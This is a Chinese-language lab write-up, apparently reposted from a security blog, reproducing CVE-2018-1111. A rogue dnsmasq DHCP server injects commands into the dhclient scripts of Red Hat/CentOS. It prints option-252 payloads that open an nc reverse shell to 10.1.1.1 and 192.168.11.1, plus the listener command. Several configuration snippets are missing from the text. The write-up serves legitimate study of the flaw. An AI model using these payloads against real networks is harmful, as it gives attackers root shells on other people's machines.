當前位置:
首頁 > 最新 > CVE2018-1111 漏洞復現

CVE2018-1111 漏洞復現

最新 05-21

本文作者:(來自信安之路作者團隊)

贈送書籍:《Android 應用安全防護和逆向分析》

近日,紅帽官方發布了安全更新,修復了編號為 CVE-2018-1111 的遠程代碼執行漏洞,攻擊者可以通過偽造 DHCP 伺服器發送響應包,攻擊紅帽系統,獲取 root 許可權並執行任意命令。

目前相關利用代碼已經公開,可用於本地網路攻擊。

影響版本

1、Red Hat Enterprise Linux Server 6

2、Red Hat Enterprise Linux Server 7

3、CentOS 6

4、CentOS 7

漏洞詳情

DHCP 是一個區域網的網路協議,主要用於內部網路動態 IP 地址分配。

Redhat 提供的 dhcp 客戶端軟體包 dhclient 的腳本為

/etc/NetworkManager/dispatcher.d/11-dhclient(Red Hat Enterprise Linux 7)

/etc/NetworkManager/dispatcher.d/10-dhclient(Red Hat Enterprise Linux 6)

當 NetworkManager 組件從 DHCP 伺服器收到 DHCP 響應時執行該腳本。

使用單引號使參數值逃逸成功,導致了命令執行,payload 如下:

--dhcp-option="252,x"&nc -e /bin/bash 10.1.1.1 1337 #"

payload 實現的效果是,通過命令執行 nc 操作,反彈 shell 到 10.1.1.1 的 1337 埠上。


環境準備

這裡我用的測試機器系統分別是Centos 7Kali 2018.2

Centos 7作為被攻擊機,需要設置自動獲取 ip 地址。

Kali 2018.2作為攻擊機,需要搭建 DHCP 伺服器,實現攻擊效果。

攻擊環境搭建

這裡我用 vmware 虛擬機來實現,兩個系統都是連接到 VMnet1 網卡上(僅主機模式),並且關閉網卡上的 DHCP 服務。

接著我們開始配置 kali 上的 dhcp 伺服器,dnsmasq 是一個小巧且方便地用於配置 DNS 和 DHCP 的工具,適用於小型網路,它提供了 DNS 功能和可選擇的 DHCP 功能,可以快速搭建一個 DNS 服務或者 DHCP 服務。

首先我們設置一下 需要使用到的配置文件 。

: 表示要分配給客戶機的 ip 地址範圍和租約時間

: 表示指定給 DHCP 客戶端的選項信息

: 表示日誌記錄器

其中配置文件中包括的 option 取值及含義如下:

3: 設置網關地址選項

6: 設置 DNS 伺服器地址選項

252: 為 DHCP 客戶端提供了一個用於配置其代理設置的 URL,wpad-proxy-url

中涉及到的 是私人使用保留部分的一部分, 為 dhcp 伺服器使用 252,然後在他們的瀏覽器中寫入與 dhcp 伺服器交談的能力,並要求代碼 252 從該選項列出的 URL 中獲取關於網路上代理設置的信息。

這裡 dnsmasq.conf 中的 我設置為 這個 ip 地址範圍,租約時間為 12h。

網關地址和 伺服器均設置為 kali 本地網卡的 ip 地址,kali 的 ip 地址為靜態 ip。

修改好 配置文件之後,還不能直接啟動 服務。

命令執行 payload 如下:

dnsmasq -dC /etc/dnsmasq.conf --dhcp-option="252,x"&nc -e /bin/bash 192.168.11.1 1337 #"

這裡的 -d 表示調試模式,-C 表示指定配置文件運行 dnsmasq 服務,更多有關 dnsmasq 的命令詳解可以用 查看。

命令執行的效果是通過 nc 反彈 shell 到 192.168.11.1 的 1337 埠,所以需要在 kali 開啟 nc 埠監聽,命令如下:

nc -l -p 1337 -v

然後再用上述命令啟動 dnsmasq 服務。

此時 Centos 需要重啟網路服務,獲取 DHCP 伺服器下發的 ip 地址,這裡可以看到獲取到了 ip 地址 192.168.11.19。

我們再回到 kali 上查看調試結果,並執行 , , 等命令,通過返回的結果顯示,我們已經成功獲取到伺服器的 root 許可權。

漏洞復現到此結束~!通過本文,大家可以學習到如何用 dnsmasq 來快速搭建一個 DNS 服務或者 DHCP 服務,並對 DHCP 服務的 option 部分值和含義有相關了解,以及學習了 漏洞的復現及環境搭建。有興趣的可以學習一下 DHCP 服務 option 常見值和含義、dnsmasq 的命令詳解。

本文章的內容只限技術研究,用於非法攻擊產生風險自擔。

參考鏈接

DynoRoot:Red Hat DHCP 客戶端命令執行漏洞 CVE-2018-1111 預警

https://www.anquanke.com/post/id/145201


喜歡這篇文章嗎?立刻分享出去讓更多人知道吧!

本站內容充實豐富,博大精深,小編精選每日熱門資訊,隨時更新,點擊「搶先收到最新資訊」瀏覽吧!


請您繼續閱讀更多來自 全球大搜羅 的精彩文章:

錢,難賺。情,難斷。人,難做
這幾天買一些韭菜回家烙菜盒,是最好不過的事了……

TAG:全球大搜羅 |